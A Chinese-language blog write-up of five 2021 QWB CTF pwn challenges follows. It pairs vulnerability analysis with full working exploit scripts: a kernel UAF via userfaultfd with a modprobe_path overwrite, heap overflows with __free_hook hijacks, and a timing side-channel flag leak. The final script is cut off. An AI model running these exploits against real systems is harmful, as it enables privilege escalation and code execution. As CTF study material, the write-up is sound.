2021-QWB题解

2021-06-25

字数统计: 6.1k字 | 阅读时长≈ 33分

2021 强网杯，一如既往的超多pwn题。

notebook

程序分析

一道kernel题目，并没有典型的一些内核漏洞。但是看到了一些读写锁，以及 copy_from_user等操作。所以猜测为条件竞争漏洞。这里为了实现一个稳定的UAF漏洞，选择使用 user-fault缺页机制来实现。

ssize_t __fastcall mynote_write(file *file, const char *buf, size_t idx, loff_t *pos)
{
  unsigned __int64 v4; // rdx
  unsigned __int64 v5; // rdx
  size_t size1; // r13
  void *chunk; // rbx
  ssize_t result; // rax

  _fentry__(file);
  if ( v4 > 0x10 )
  {
    printk("[x] Write idx out of range.\n", buf);
    result = -1LL;
  }
  else
  {
    v5 = v4;
    size1 = notebook[v5].size;
    chunk = notebook[v5].note;
    _check_object_size(chunk, size1, 0LL);
    if ( copy_from_user(chunk, buf, size1) )
    {
      printk("[x] copy from user error.\n", buf);
      result = 0LL;
    }
    else
    {
      printk("[*] Write success.\n", buf);
      result = 0LL;
    }
  }
  return result;
}

ssize_t __fastcall mynote_read(file *file, char *buf, size_t idx, loff_t *pos)
{
  unsigned __int64 v4; // rdx
  unsigned __int64 v5; // rdx
  size_t size1; // r13
  void *note1; // rbx
  ssize_t result; // rax

  _fentry__(file);
  if ( v4 > 0x10 )
  {
    printk("[x] Read idx out of range.\n", buf);
    result = -1LL;
  }
  else
  {
    v5 = v4;
    size1 = notebook[v5].size;
    note1 = notebook[v5].note;
    _check_object_size(note1, size1, 1LL);
    copy_to_user(buf, note1, size1);
    printk("[*] Read success.\n", note1);
    result = 0LL;
  }
  return result;
}

有一个常见的对堆块读写的操作，里面涉及到copy_from_user和copy_to_user函数。然后这里没有加读写锁。然后程序还加了一些多余的对堆块的操作，比如堆块删除。

__int64 __fastcall notedel(size_t idx)
{
  __int64 v1; // rsi
  note *chunk_s; // rbx
  __int64 result; // rax

  _fentry__(idx);
  if ( idx > 0x10 )
  {
    printk("[x] Delete idx out of range.\n", v1);
    result = -1LL;
  }
  else
  {
    raw_write_lock(&lock);
    chunk_s = &notebook[idx];
    kfree(notebook[idx].note);
    if ( chunk_s->size )
    {
      chunk_s->size = 0LL;
      chunk_s->note = 0LL;
    }
    raw_write_unlock(&lock);
    printk("[-] Delete success.\n", v1);
    result = 0LL;
  }
  return result;
}

然后还给了一个类似的后门函数，可以输出所有的堆块地址。

__int64 __fastcall notegift(void *buf)
{
  __int64 v1; // rsi

  _fentry__(buf);
  printk("[*] The notebook needs to be written from beginning to end.\n", v1);
  copy_to_user(buf, notebook, 256LL);
  printk("[*] For this special year, I give you a gift!\n", notebook);
  return 100LL;
}

然后也给了驱动的基址，我们可以直接用 lsmod读取出来。

利用分析

这里可以当执行 write函数，去写堆块数据时，在 copy_from_user函数处触发 user-fault缺页中断。然后去穿插执行 delete函数，将该堆块释放掉。然后，再去写数据。那么就构造了一个 UAF漏洞。

泄漏fd指针

这里需要感谢 xxrw 大佬，指点了我们 4.14版本之后，内核堆块加了一个保护，会对 fd指针进行加密。加密的方法是：

fd = now_heap_addr ^ next_free_heap_addr ^ random_num。

而这里，我们申请一个 chunk出来之后，其实并不会对这个chunk的内容进行操作，也就是可以泄漏出 fd的值。然后再接着申请堆块，最后通过 gift函数，可以输出申请的堆块地址。

那么，这里最后可以得到当前堆块地址，和紧邻的申请的下一块地址，计算出 random_num。

然后再通过 UAF漏洞，修改一个释放的chunk的 fd指针为 fd = now_heap_addr ^ (name+0xf0) ^ random_num。

然后，还需要在 name+0xf0处伪造一个 fd = (name+0xf0) ^ (random_num) ^ (next_heap_addr)

这里的操作相当于将 name+0xf0的地址插入了 now_heap和 next_heap这两个空闲堆块之间。

然后，由于分配的时候，会对整个链表进行检查，所以这里必须要在 name+0xf0处还伪造一个fd指针。

但是，这里由于分配的随机性，并不能保证我们后续分配的一定马上是 now_heap和 name+0xf0，所以这里需要多分配几次，看是否能分配到该堆块。

如果，能够分配到 name+0xf0，就相当于能够控制紧邻的heap_list，实现了任意地址读写。

泄漏地址

比赛的时候，泄漏地址卡了我们很久，最后我们比赛的方法是利用了一个bpf的cve，遍历 bpf虚表得到内核地址。

但是，后面看了其他队伍的exp，发现这里如果知道当前驱动的基址，那么可以利用驱动中的内核函数的偏移地址进行一个换算得到基址。如下是 copy_from_user在驱动中的偏移：

1	.text:0000000000000167 E8 04 0E 00 00 call _copy_from_user

这里的 0x040e是 copy_from_user函数的偏移，我们进行如下换算：

1	size_t kernel_base = (((uint32_t)buf1 + modaddr + 0x16C) \| 0xFFFFFFFF00000000) - 0x476C30;

复写mod_probepath

最后即可通过覆写 modprobe_path来 getshell

EXP

#define _GNU_SOURCE
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <pthread.h>
#include <errno.h>
#include <poll.h>
#include <arpa/inet.h>
#include <sys/wait.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/ipc.h>
#include <sys/shm.h>
#include <sys/msg.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <sys/un.h>
#include <sys/xattr.h>
#include <linux/userfaultfd.h>

int fd;
char buffer[0x1000] = { 0 };
size_t fault_ptr;
char buf1[0x100] = { 0 };
unsigned long kbase, kheap;
unsigned long user_cs, user_ss, user_rflags;
size_t modprobe = 0xffffffff86a5d2e0 ;
char buf2[0x100] = { 0 };
typedef struct notes{
    size_t idx;
    size_t size;
    char* buf;
}Note;

void err(char* buf){
    printf("Error %s\n", buf);
    exit(-1);
}
void fatal(const char *msg) {
  perror(msg);
  exit(1);
}

void noteadd(size_t idx, size_t size, char* buf){
    Note notess;
    memset(&notess,0,sizeof(Note));
    notess.buf = buf;
    notess.size = size;
    notess.idx = idx;
    if(-1 == ioctl(fd, 256, &notess)){
        err("addd");
    }
}

void noteedit(size_t idx, size_t size, char* buf){
    Note notess;
    memset(&notess,0,sizeof(Note));
    notess.buf = buf;
    notess.size = size;
    notess.idx = idx;
    if(-1 == ioctl(fd, 768, &notess)){
            err("edit");
    }
}

void notedel(size_t idx, size_t size, char* buf){
    Note notess;
    memset(&notess,0,sizeof(Note));
    notess.buf = buf;
    notess.size = size;
    notess.idx = idx;
    if(-1 == ioctl(fd, 512, &notess)){
        err("delete");
    }
}
int victim_fd = 0;
void notegift(size_t idx, size_t size, char* buf){
    Note notess;
    memset(&notess,0,sizeof(Note));
    notess.buf = buf;
    notess.size = size;
    notess.idx = idx;
    if(-1 == ioctl(fd, 100, &notess)){
        err("gift");
    }
}

int fault_fd = 0;
void* handler(void *arg){
    struct uffd_msg msg;
    static int fault_cnt = 0;
    unsigned long uffd = (unsigned long)arg;
    puts("[+] Handler created");

    struct pollfd pollfd;
    int nready;
    pollfd.fd     = uffd;
    pollfd.events = POLLIN;
    nready = poll(&pollfd, 1, -1);
    if (nready != 1)  // 这会一直等待，直到copy_from_user访问FAULT_PAGE
        {
        puts("wrong pool return\n");
        exit(-1);
    }   
    printf("[+] Begin handler\n");

    //here, we can write our own code
    if(fault_cnt == 0){
        puts("uaf read:");
        notedel(3, 0x40, buf1);
    }
    if(fault_cnt == 1){
        puts("uaf:");
        notedel(5, 0x40, buf1);
    }


    if (read(uffd, &msg, sizeof(msg)) != sizeof(msg)) // 偶从uffd读取msg结构，虽然没用
    {
        puts("uffd read err\n");
        exit(-1);
    }    

    struct uffdio_copy uc;

    uc.src = (unsigned long)buffer;
    uc.dst = (unsigned long)fault_ptr;
    uc.len = 0x1000;
    uc.mode = 0;
    ioctl(uffd, UFFDIO_COPY, &uc);  // 恢复执行copy_from_user
    fault_cnt += 1;
    puts("[+] handle finished");
    return NULL;    
   
}

size_t register_userfault(){
   long uffd;        
   char *addr;       
   size_t len = 0x1000;
   pthread_t thr; 
   struct uffdio_api uffdio_api;
   struct uffdio_register uffdio_register;
   int s;
   uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
   if (uffd == -1)
   {
       puts("userfaultfd\n");
       exit(-1);
   }

   uffdio_api.api = UFFD_API;
   uffdio_api.features = 0;
   if (ioctl(uffd, UFFDIO_API, &uffdio_api) == -1)      // create the user fault fd
   {
       puts("ioctl uffd err\n");
       exit(-1);
   }
   addr = mmap(NULL, len, PROT_READ | PROT_WRITE,       //create page used for user fault
               MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
   if (addr == MAP_FAILED)
   {
       puts("map err\n");
       exit(-1);
   }

   printf("Address returned by mmap() = %p\n", addr);
   uffdio_register.range.start = (size_t) addr;
   uffdio_register.range.len = len;
   uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
   if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == -1)//注册页地址与错误处理fd，这样只要copy_from_user
//                                       //访问到FAULT_PAGE，则访问被挂起，uffd会接收到信号
   {
       puts("ioctl register err\n");
       exit(-1);
   }

   s = pthread_create(&thr, NULL, handler, (void *) uffd); //handler函数进行访存错误处理
   if (s != 0) {
       errno = s;
        puts("pthread create err\n");
       exit(-1);
   }
   return addr;
}

void show(u_int64_t *addr, int size)
{
    int i;
    puts("--------------------------------------------");
    for (i = 0; i < size / 2; i++)
    {
        printf("0x%04lx ", (size_t)i * 0x10);
        printf("0x%016lx 0x%016lx\n", (size_t)addr[2 * i], (size_t)addr[2 * i + 1]);
    }
    if (size & 1)
    {
        printf("0x%04lx ", (size_t)i * 0x10);
        printf("0x%016lx 0x%016lx\n", (size_t)addr[size - 1], 0ul);
    }
    puts("--------------------------------------------");
}

int t(char c)
{
    if (c >= '0' && c <= '9')
    {
        return (int)(c - '0');
    }
    else if (c >= 'a' && c <= 'f')
    {
        return (int)(c - 'a') + 10;
    }
    else
        return -1;
}

size_t my_system(const char *cmd)
{
    char result[10240] = {0};
    char buf[1024] = {0};
    FILE *fp = NULL;

    if ((fp = popen(cmd, "r")) == NULL)
    {
        printf("popen error!\n");
        return -1;
    }

    while (fgets(buf, sizeof(buf), fp))
    {
        strcat(result, buf);
    }

    pclose(fp);
    // printf("result: %s\n", result);
    char *ss = strstr(result, "0x");
    puts(ss);
    size_t a = 0;
    char *c = ss + 2;
    for (int i = 0; i < 16; i++)
    {
        a = (a << 4) + t(*c);
        c++;
    }
    return a;
}

int main(){
    system("echo -ne '#!/bin/sh\n/bin/cp /flag /tmp/flag\n/bin/chmod 777 /tmp/flag' > /tmp/getflag.sh");
    system("chmod +x /tmp/getflag.sh");
    system("echo -ne '\\xff\\xff\\xff\\xff' > /tmp/ll");
    system("chmod +x /tmp/ll");
    size_t modaddr = my_system("cat /tmp/moduleaddr");

    fd = open("/dev/notebook", O_RDWR);
    if (fd < 0){
        err("open");
    }

    fault_ptr = register_userfault();

    char buf[512] = { 0 };
    memset(buf, 'a', 512);

    size_t id = 0;
    size_t sz = 0x40;
    puts("noteadd");
    noteadd(0, sz, buf);
    noteadd(1, sz, buf);
    noteadd(2, sz, buf);
    noteadd(3, sz, buf);
    noteadd(4, sz, buf);
    noteadd(5, sz, buf);

    puts("gift");
    notegift(0, sz, buf);
    show(buf, 0x60>>3);
    //printf("gift:\n %s\n", buf);

    size_t heap3 = *(size_t*)(buf+0x30);
    size_t heap4 = *(size_t*)(buf+0x40);
    size_t heap5 = *(size_t*)(buf+0x50);

    printf("heap1: 0x%llx, 0x%llx, 0x%llx\n", heap3, heap4, heap5);

    puts("free 5, 4, 3");
    notedel(5, sz, buf);
    notedel(4, sz, buf);
    notedel(3, sz, buf);

    puts("get enc data:");
    getchar();
    // memset(buf1, 'a', 0xf0);
    // *(size_t*)(buf1+0xf0) = (size_t*)fake_chunk1;
    noteadd(3, sz, buf1);
    read(fd, buf1, 3);
    show(buf1, 0x60>>3);

    puts("gift2");
    notegift(0, sz, buf);
    show(buf, 0x60>>3);

    size_t enc1 = *(size_t*)(buf1);
    size_t key = enc1^heap3^heap4;
    size_t name = modaddr+0x2400+0xf0;
    printf("key: 0x%llx, enc1: 0x%llx, name: 0x%llx\n", key, enc1, name);
    size_t fake_chunk = key^(name)^(heap3);
    size_t fake_chunk1 = key^(name)^(heap4);
    *(size_t*)buffer = (size_t*)fake_chunk;
    printf("fake_chunk: 0x%llx, 0x%llx\n", fake_chunk, fake_chunk1);
    
    getchar();

    puts("prepare oob:");
    write(fd, fault_ptr, 3);
    puts("write ok");

    memset(buf1, 'a', 0xf0);
    *(size_t*)(buf1+0xf0) = (size_t*)fake_chunk1;
    noteadd(3, sz, buf1);
    memset(buf1, 'a', 0xf0);
    *(size_t*)(buf1+0xf0) = (size_t*)fake_chunk1;

    size_t tmp_chunk;
    int heapi = 4;
    for(heapi=4; heapi<0x10; heapi++){
        noteadd(heapi, sz, buf1);
        notegift(0, sz, buf);
        tmp_chunk = *(size_t*)(buf+0x10*heapi);
        printf("tmp_chunk: %d 0x%llx\n", heapi,tmp_chunk);
        if(tmp_chunk == heap3) {
            printf("Found chunk: %d\n",heapi);
            break;
        }
        if(heapi == 0xF)
        {
            puts("Can not Found the Target");
            _exit(-1);
        }
    }
    heapi += 1;
    noteadd(heapi, sz, buf1);

    puts("gift3");
    notegift(0, sz, buf);
    show(buf, 0x100>>3);

    getchar();

    *(size_t*)buf = 0x0;
    *(size_t*)(buf+0x8) = 0x0;
    *(size_t*)(buf+0x10) = modaddr+0x168;
    *(size_t*)(buf+0x18) = 0x40;

    write(fd, buf, heapi);

    read(fd, buf1, 0);
    show(buf1, 0x60>>3);
    size_t kernel_base = ((*(uint32_t*)buf1 + modaddr + 0x16C) | 0xFFFFFFFF00000000) - 0x476C30;
    printf("kernel_base: 0x%llx\n", kernel_base);

    modprobe = kernel_base+0x125D2E0;
    printf("modprobe: 0x%llx\n", modprobe);

    *(size_t*)buf = 0x0;
    *(size_t*)(buf+0x8) = 0x0;
    *(size_t*)(buf+0x10) = modprobe;
    *(size_t*)(buf+0x18) = 0x40;   

    write(fd, buf, heapi);

    memset(buf1, '\x00', 0xf0);
    strncpy(buf1, "/tmp/getflag.sh", 0x20);
    puts("change modporbe:");
    write(fd, buf1, 0);

    system("/tmp/ll");
    system("cat /tmp/flag");

    return 0;
}

ezCloud

程序分析

  for ( index = 0LL; index <= 15 && *(&user_login->is_vip + index + 8); ++index )// add_note
    ;
  if ( *(&user_login->is_vip + index + 8) )
  {
    note = (note *)calloc(0x18uLL, 1uLL);
    strdump((__int64)note, 8uLL, "Invalid!");
    v5 = genoutput((__int64)note);
    destroy_msg((__int64)note);
    free(note);
    return v5;
  }
  *(&user_login->is_vip + index + 8) = (__int64)malloc(0x18uLL);
  strdump(*(&user_login->is_vip + index + 8), a1->user_content_length, (const void *)a1->user_content);
}

add堆块的时候，如果size=0，那么就不会对该堆块进行清空。有可能会残留堆块数据。如果刚好残留了一个note地址。那么可以通过修改这个残留的 note地址，去修改下一个 note里的存储地址。最后将该存储地址指向user_info结构体。

利用分析

漏洞点在于，当申请size=0的堆块时，就不会对该堆块进行晴空。如果残留数据刚好残留了一个堆地址，以及在0x10处残留了一个大数。那么后续就能够实现一个堆溢出。

为了构造一个在0x0残留堆地址的chunk只需要是tcache中取出即可，但是要通过堆喷大量的 0x20大小的堆块。这里选择用get来堆喷。

EXP

from pwn import *
from urllib import quote
context.update(arch='amd64',os='linux',log_level='debug')
context.terminal=(['tmux', 'split', '-h'])
filename = './EzCloud'
libcname = '/lib/x86_64-linux-gnu/libc.so.6'
debug = 1
if debug == 1:
    p = process(filename)
    libc = ELF(libcname)
    elf = ELF(filename)
else:
    p = remote()
    libc = ELF(libcname)
    elf = ELF(filename)

def add(idx, id, size, py):
    flag = quote("new note")
    payload = '''POST /notepad HTTP/1.1\r\nContent-Length: {}\r\nContent-Type: application/x-www-form-urlencoded\r\nLogin-ID: {}\r\nNote-Operation: {}\r\nNote-ID: {}\r\n\r\n{}'''.format(size, id, flag, idx, py)
    p.sendline(payload)
    p.recvuntil('</html>')

def add1(idx, id, size, py):
    flag = quote("new note")
    payload = '''POST /notepad HTTP/1.1\r\nContent-Length: {}\r\nContent-Type: multipart/form-data\r\nLogin-ID: {}\r\nNote-Operation: {}\r\nNote-ID: {}\r\n\r\n{}'''.format(
        size, id, flag, idx, py)
    p.sendline(payload)
    p.recvuntil('</html>')

def add2(idx, id, size, py):
    flag = quote("new note")
    payload = '''GET /notepad HTTP/1.1\r\nContent-Length: {}\r\nContent-Type: multipart/form-data\r\nLogin-ID: {}\r\nNote-Operation: {}\r\nNote-ID: {}\r\n\r\n{}'''.format(
        size, id, flag, idx, py)
    p.sendline(payload)
    p.recvuntil('</html>')

def add3(idx):
    payload = '''GET /notepad HTTP/1.1\r\nLogin-ID: {}\r\nbbbbbbbbbbbbbbbbbbb: sssssssssssssssssssssss\r\n12345678901234567890123: zzzzzzzzzzzzzzzzzzzzzzz\r\n\r\n'''.format(idx)
    p.sendline(payload)
    p.recvuntil('</html>')


def login(id, size, py):
    payload = '''POST /login HTTP/1.1\r\nContent-Length: {}\r\nContent-Type: multipart/form-data\r\nLogin-ID: {}\r\n\r\n{}'''.format(size, id, py)
    p.sendline(payload)
    p.recvuntil('</html>')

def edit(idx, id, size, py):
    flag = quote("edit note")
    payload = '''POST /notepad HTTP/1.1\r\nContent-Length: {}\r\nContent-Type: application/x-www-form-urlencoded\r\nLogin-ID: {}\r\nNote-Operation: {}\r\nNote-ID: {}\r\n\r\n{}'''.format(size, id, flag, idx, py)
    p.sendline(payload)
    p.recvuntil('</html>')

def delete(idx, id, size):
    flag = quote("delete note")
    payload = '''POST /notepad HTTP/1.1\r\nContent-Length: {}\r\nContent-Type: application/x-www-form-urlencoded\r\nLogin-ID: {}\r\nNote-Operation: {}\r\nNote-ID: {}\r\n\r\n'''.format(size, id, flag, idx)
    p.sendline(payload)
    p.recvuntil('</html>')

def logout(id, size, py):
    payload = '''POST /logout HTTP/1.1\r\nLogin-ID: {}\r\nContent-Length: {}\r\nContent-Type: multipart/form-data\r\n\r\n{}'''.format(id, size, py)
    p.sendline(payload)
    p.recvuntil('</html>')

def get_flag(id, size, py):
    payload = '''GET /flag HTTP/1.1\r\nLogin-ID: {}\r\nContent-Length: {}\r\nContent-Type: multipart/form-data\r\n\r\n{}'''.format(id, size, py)
    p.sendline(payload)
    p.recvuntil('</html>')

def pwn():
    py1 = 'a'*0xf85

    login('0', len(py1), py1)
    py = quote('a'*0x17)

    add('0', '0', len(py), py)
    # gdb.attach(p, 'bp $rebase(0x8d64)')
    for i in range(40):
        add3('0')

    print("chunk overflow")
    for i in range(2):
        add1(str(i), '0', len(py), py)

    #logout('0', len(py1), py1)
    print("make user")
    login('1', len(py1), py1)
    login('2', len(py1), py1)
    login('0', len(py1), py1)
    print("[!!!] edit :")
    py = quote('a'*0x18+p64(0xd1)+p64(1))
    edit('2', '0', len(py), py)
    get_flag('1', len(py), py)
    p.interactive()

pwn()

shellcode

利用分析

就是一个写shellcode的题目。但是首先有一个检查，输入的 shellcode必须是可见字符，可以通过 pwnable.tw的一道题的写法来先实现一个任意shellcode读取。然后通过改变架构，来执行 open函数，读取 flag后，通过测信道将 flag输出出来。

EXP

from pwn import *
context.update(os='linux', log_level='debug')
context.terminal=['tmux', 'split', '-h']

filename = './shellcode'
libcname = '/lib/x86_64-linux-gnu/libc.so.6'
# debug = 0
# if debug == 2:
#     p = process(filename)
#     elf = ELF(filename)
#     libc = ELF(libcname)
# else:
#      p = remote('10.4.8.211', 5009)
#      elf = ELF(filename)
#      libc = ELF(libcname)


#retfq
retfqs = '''
    push 0x23
'''#20

read64 = '''
        push 0x60606060
        pop edx
        sub byte ptr[esi + 0x23] , dl
        sub byte ptr[esi + 0x23] , dl
        sub byte ptr[esi + 0x23] , dl
        sub byte ptr[esi + 0x24] , dl
        sub byte ptr[esi + 0x24] , dl
        sub byte ptr[esi + 0x24] , dl
xor al, 0x4c
xor al, 0x60
xor al, 0x70
push eax
pop edx
xor al, 0x79
push eax
'''#/x25/x2f
open_x86 = '''
		push 0x6761
		push 0x6c662f2e
		push esp
		pop ebx
		xor ecx,ecx
		mov eax,5
		int 0x80
'''
retff = '''
    push 0x23
    add esi, 0x2f
    push rsi
    retfq
'''
readflag1 = '''
    push 0x00000000
    push 0x33
    push 0x500051
'''
readflag2 = '''
    mov rdi,0x3
    mov rsi,rsp
    mov rdx,0x60
    xor rax,rax
    syscall
    mov rdi,1
    mov rax,1
    syscall
'''

readx = '''
    mov rsi, 0x500300
    mov rdi, 3
    mov rcx, 0x30
    mov rax, 0
    syscall
'''

writex = '''
    mov rsi, rbx
    mov rdi, 1
    mov rdx, 0x30
    mov rax, 1
    syscall
'''

mmmaps = '''
    mov rax, 9
    mov rdi, 0x500000
    mov rsi, 0x1000
    mov rdx, 7
    mov r10d, 0x22
    mov r8d, 0xFFFFFFFF
    mov r9d, 0
    syscall

    mov rsi, 0x500000
    mov rdi, 0
    mov rdx, 0x100
    mov rax, 0
    syscall
    
    push 0x500001
    ret
'''

ret32 = '''
    push 0x500500
    pop rsp
    push 0x23
    push 0x500081
'''

ret320 = '''
    push 0x500500
    pop rsp
    push 0x23
    push 0x500015
'''

write_x86 = '''
	push 1
	push 0x500500
	push 0x40
	push esp
	pop ebx
	xor ecx,ecx
    mov eax,4
    int 0x80
'''

leak_flag = '''
    
'''

def pwn(p, index, ch):
    gdb.attach(p)
    retfqsh = asm(retfqs, arch='i386')+'\x20\x48'
    sc = asm(read64, arch='i386')
    p.sendline(sc+'\x2f\x25')
    rf2 = asm(readflag2, arch='amd64')
    raw_input()

    # cmp and jz
    if index == 0:
        shellcode = "cmp byte ptr[rsi+{0}], {1}; jz $-3; ret".format(index, ch)
    else:
        shellcode = "cmp byte ptr[rsi+{0}], {1}; jz $-4; ret".format(index, ch)

    p.sendline('a'*0x25+asm(mmmaps, arch='amd64'))

    payload = asm(ret320, arch='amd64')+'\x48\xcb'
    payload = payload.ljust(0x10, b'\x00')+p32(0x500200)+asm(open_x86, arch='i386')+asm(readflag1, arch='i386')+'\x48\xcb'
    payload = payload.ljust(0x50, b'\x00')
    payload += asm(readx, arch='amd64')+asm(ret32, arch='amd64')
    payload = payload.ljust(0x7b, b'\x00')
    payload += asm(shellcode, arch='amd64')
    p.sendline(payload)

index = 0
ans = []
debug = 1
while True:
    for ch in range(0x20, 127):
        if debug == 0:
            p = remote('183.129.189.61',  60402)
        else:
            p = process(filename)
        pwn(p, index, ch)
        start = time.time()
        try:
            p.recv(timeout=2)
        except:
            pass
        end = time.time()
        p.close()
        if end-start > 1.5:
            ans.append(ch)
            print("".join([chr(i) for i in ans]))
            break
    else:
        print("".join([chr(i) for i in ans]))
        break
    index = index + 1

print("".join([chr(i) for i in ans]))

pipeline

程序分析

程序漏洞很明显，通过输入一个负数即可实现一个堆溢出。

利用分析

通过堆溢出修改紧邻的pipe结构体，修改其中的堆块地址，来实现任意地址写。

然后劫持 free_hook，通过 realloc去触发 free_hook。

EXP

from pwn import *
context.update(os='linux', log_level='debug')
context.terminal=['tmux', 'split', '-h']

filename = './pipeline'
libcname = '/lib/x86_64-linux-gnu/libc.so.6'
debug = 1
if debug == 1:
    p = process(filename)
    elf = ELF(filename)
    libc = ELF(libcname)
else:
     p = remote('10.4.8.211', 5009)
     elf = ELF(filename)
     libc = ELF(libcname)

def add():
    p.sendlineafter('>>', str(1))

def edit(idx, off, size):
    p.sendlineafter('>>', str(2))
    p.sendlineafter('index: ', str(idx))
    p.sendlineafter('offset: ', str(off))
    p.sendlineafter('size: ', str(size))

def delete(idx):
    p.sendlineafter('>>', str(3))
    p.sendlineafter('index: ', str(idx))

def append(idx, size, py):
    p.sendlineafter('>>', str(4))
    p.sendlineafter('index: ', str(idx))
    p.sendlineafter('size: ', str(size))
    p.sendlineafter('data: ', py)

def show(idx):
    p.sendlineafter('>>', str(5))
    p.sendlineafter('index: ', str(idx))

def pwn():
    for i in range(9):
        add()
    gdb.attach(p, 'bp $rebase(0x1932)')
    for i in range(9):
        edit(i, 0x0, 0x100)

    for i in range(8):
        edit(i, 0x0, 0x50)

    edit(0, 0x0, 0x20)
    edit(0, 0x0, 0x0)
    edit(0, 0x0, 0x8)
    show(0)
    p.recvuntil('data: ')
    libc_addr = u64(p.recvuntil('\n', drop=True)[-6:].ljust(8, b'\x00'))
    libc_base = libc_addr - 0x10 - 96 - libc.sym['__malloc_hook']-0xa0
    print("libc_base:",hex(libc_base),hex(libc_addr))
    free_hook = libc_base + libc.sym['__free_hook']
    system_addr = libc_base + libc.sym['system']

    edit(0, 0x0, 0x80)
    print("split 0x20")
    edit(0, 0x0, 0x60)

    add()
    edit(9, 0x0, 0x100)

    payload = 'a'*0x60 + p64(0) + p64(0x21) + p64(free_hook)
    append(0, 0xffff0080, payload)

    append(9, 0x8, p64(system_addr))

    append(1, 0x8, '/bin/sh\x00')

    edit(1, 0x0, 0x0)
    #edit(1, 0x0, 0x50)
    p.interactive()

pwn()

Baby_diary

程序分析

void __fastcall sub_1528(unsigned int idx, int size)
{
  __int64 chunk; // [rsp+10h] [rbp-8h]

  if ( idx <= 0x18 && chunk_list[idx] )
  {
    chunk = chunk_list[idx];
    size_list[idx] = size;
    if ( size )
      *(size + 1LL + chunk) = (*(size + 1LL + chunk) & 0xF0) + enc2(idx);
  }
}

漏洞很明显，有一个人造的 off-by-one漏洞。但是这个 off-by-one只能修改相邻 chunk的 size的最低4位 bit。所以其实还是只能利用 off-by-one来实现堆重叠。

利用分析

而高于 2.29的 off-by-one漏洞的利用，有两种方法。

一是能够拿到程序基址，利用 chunk+list里含有当前堆块的地址，来绕过 unlink检查。好像Nu1L队是利用这个方法来做的，这个泄漏基址时也需要爆破。

二是模版类题目，即利用largebin attack来攻击。

这里我用的是第二种，走 largebin attack的方法。但是这里有一个限制条件就是要保证利用的 largebin堆块的倒数第三、四个字节地址是 \x2000。如果要爆破比率较低，基本就是靠欧皇水平了。

EXP

from pwn import *
context.update(os='linux', log_level='debug')
context.terminal=['tmux', 'split', '-h']

filename = './baby_diary'
libcname = '/lib/x86_64-linux-gnu/libc.so.6'
debug = 1
if debug == 1:
    p = process(filename)
    elf = ELF(filename)
    libc = ELF(libcname)
else:
     p = remote('10.4.8.211', 5009)
     elf = ELF(filename)
     libc = ELF(libcname)

def add(size, payload):
    p.sendlineafter('>> ', str(1))
    p.sendlineafter('size: ', str(size))
    p.sendafter('content: ', payload)

def output(idx):
    p.sendlineafter('>> ', str(2))
    p.sendlineafter('index: ', str(idx))

def delete(idx):
    p.sendlineafter('>> ', str(3))
    p.sendlineafter('index: ', str(idx))

# def pwn():
#    gdb.attach(p, 'bp $rebase(0x18ce)')
while True:
    try:
        add(0x7000, 'aa\n') #0
        print("chunk")
        add(0x1000 - 0x2a0-0x150, 'aa\n')  # 1

        for i in range(7):  # 2-8
            add(0x27, 'aa\n')

        add(0xb20, '\n')  # 9 0x10
        add(0x10, '\n')  # 10 0xb40

        delete(9)  # 0x10
        print("make chunk into largebin")
        add(0x1000, '\n')  # chunk10 to largebin 9

        print("split largebin")
        payload = p64(0) + p64(0xd0) + p8(0x40)
        add(0x27, payload+'\n')  # idx:11 get a chunk from largebin 0x10

        delete(11)
        payload = '\x05'
        payload = payload.ljust(8, b'\x00')
        add(0x27, payload+'\n')

        for i in range(7):
            delete(2+i)

        delete(11)

        for i in range(7):
            add(0x27, 'aa\n')

        payload = '\x01'
        payload = payload.ljust(7, b'\x00')
        add(0x27, payload+'\n')

        add(0x27, '\n')  # 12 0x40
        add(0x27, '\n')  # 13 0x70
        add(0x27, '\n')  # 14 0xa0
        add(0x27, '\n')  # 15 0xd0

        # fill in tcache_entry[1](size: 0x30)
        for i in range(7):  # 2-8
            delete(2 + i)

        delete(14)  # 0xa0
        delete(12)  # 0x40

        # clear tcache_entry[1](size: 0x30)
        for i in range(7):  # 2-8
            add(0x27, '\n')

        print("fastbin to smallbin")
        # fastbin to smallbin
        add(0x1000, '\n')  # 12 0x4d0

        # get a chunk from smallbin , another smallbin chunk to tcache
        # 20, change fake chunk's fd->bk to point to fake chunk
        print("change fake chunk's fd->bk to fake chunk")
        add(0x27, p64(0) + p8(0x20)+'\n')  # 0x40  14

        # clear chunk from tcache
        add(0x27, '\n')  # 16 0x500

        for i in range(7):  # 2-8
            delete(2 + i)

        print("free to fastbin")
        # free to fastbin
        delete(13)  # 0x70
        delete(11)  # 0x10

        for i in range(7):  # 2-8
            add(0x27, '\n')

        print("change fake chunk's bk->fd")
        # change fake chunk's bk->fd
        add(0x27, p8(0x20)+'\n')  # 11 0x10
        add(0x27, '\n')  # 13 0x70

        add(0x3f0, '\n')    #17

        print("overwrite 0x530")
        add(0x17, '\n') #18
        print('trigger off-by-null')
        add(0x5f7, '\n')  # 19 trigger off-by-null 0x540
        add(0x100, '\n')  # 20

        delete(18)  # 0x530

        # off-by-null
        print("off-by-null")
        add(0x17, "\x00" * 0x17)  # 18
        delete(18)
        add(0x16, '\x05'+'\x00'*0xf+'\n')   #18
        #gdb.attach(p, 'bp $rebase(0x18ce)')
        # trigger
        print("trigger")
        delete(19)  # 0x540

        delete(13)
        add(0x27, '\x01'+'\x00'*0x17+'\n')  #13

        add(0x40, 'aaa\n')  #19
        output(13)

        libc_addr = u64(p.recvuntil('\x7f', timeout=2)[-6:].ljust(8, b'\x00'))
        print("libc_addr:",hex(libc_addr))
        if str(hex(libc_addr)).find('7f') >= 0:
            print('get addr')
            break
        else:
            raise EOFError
    except EOFError:
        p.close()
        p = process(filename)
        continue

libc_base = libc_addr - 96 - 0x10 - libc.sym['__malloc_hook']
free_hook = libc_base + libc.sym['__free_hook']
system_addr = libc_base + libc.sym['system']
print('system_addr:',hex(system_addr),hex(free_hook))

#delete(13)

add(0x60, p64(free_hook)+'\n')  #21
delete(2)
delete(16)
delete(21)
payload = 'a'*0x20+p64(0)+p64(0x31)+p64(free_hook)
